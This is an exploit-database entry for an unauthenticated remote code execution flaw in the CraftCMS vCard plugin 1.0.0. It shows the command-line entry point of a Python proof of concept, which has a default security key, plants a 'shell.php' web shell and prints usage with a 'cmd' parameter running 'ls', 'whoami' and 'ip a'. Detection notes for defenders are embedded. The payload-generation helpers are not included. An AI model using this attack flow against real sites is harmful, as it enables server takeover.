Exploits / Vulnerability Discovered : 2020-05-20 |
Type : webapps |
Platform : php
This exploit / vulnerability, "Craftcms 3 vcard plugin 1.0.0 remote code execution", is for educational purposes only; if you use it, you do so at your own risk!
def main():
    """Command-line entry point of the CraftCMS vCard plugin proof of concept.

    Parses the target URL (-u), the plugin security key (-s) and an output
    file name (-f), then passes them to generatePayload, encryptPayload and
    exploitCard. Those three helpers are defined outside this function.

    What a defender can read off this function:
      * Nothing here supplies credentials or a session, which matches the
        "Unauthenticated" wording in the tool description.
      * The key falls back to a fixed string. Presumably that is the value
        the plugin ships with, so installations that never changed it would
        be the exposed ones (confirm against the plugin's settings).
      * A return value of 500 from exploitCard is treated as success. It
        looks like an HTTP status, so 500 responses on the vCard download
        action named in the -u help text are worth alerting on.
      * The success message points at a new PHP file in the webroot driven
        by a 'cmd' GET parameter. Unexpected .php files there, and requests
        carrying 'cmd=', are the follow-on indicators to hunt for.
    """
    cli = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin")
    cli.add_argument(
        '-u',
        dest='url',
        required=True,
        help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=",
    )
    cli.add_argument(
        '-s',
        dest='salt',
        default="s34s4L7",
        help="Security key required for encrypting payload. Defaul is 's34s4L7'",
    )
    cli.add_argument(
        '-f',
        dest='fname',
        default="shell.php",
        help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'",
    )

    # Fewer than two command-line tokens after the script name: show usage
    # and exit with status 0 before argparse gets a chance to report an error.
    if len(sys.argv) < 3:
        cli.print_help()
        sys.exit(0)

    opts = cli.parse_args()

    # Build the payload for the chosen file name, then protect it with the
    # supplied key. Both steps are implemented by helpers outside this block.
    raw_payload = generatePayload(opts.fname)
    sealed_payload = encryptPayload(raw_payload, opts.salt)

    status = exploitCard(opts.url, sealed_payload)
    if status != 500:
        # Any other result is silently ignored, as in the original.
        return

    print(
        "Deserialization has been triggered, navigate to craftCMS webroot/"
        + opts.fname
        + "\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"
        + opts.fname
        + "?cmd=ls%20-al;whoami;ip%20a\n"
    )